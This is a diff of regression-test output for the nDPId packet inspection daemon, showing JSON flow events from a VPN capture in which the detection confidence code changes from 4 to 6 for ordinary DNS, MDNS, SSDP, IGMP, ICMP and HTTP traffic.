+00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2589,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}} 00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1569687287737,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":16,"thread_ts_msec":1569687287737,"pkt":"AQBeAAABLH6BsEqhCABFwAAkGHoAAAEBtp0KAAAB4AAAAQkA5rYBAgVGCgAAAQAAAAAAAP\/\/Aiw="} 
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":1.061278} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687268559,"flow_last_seen":1569687271560,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":1.061278} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687268559,"flow_last_seen":1569687271560,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687269223,"flow_last_seen":1569687272080,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} -00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1569687277139,"flow_last_seen":1569687283186,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":912,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687269223,"flow_last_seen":1569687272080,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} +00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1569687277139,"flow_last_seen":1569687283186,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":912,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247192,"flow_last_seen":1569687259297,"flow_idle_time":200000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247192,"flow_last_seen":1569687259297,"flow_idle_time":200000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
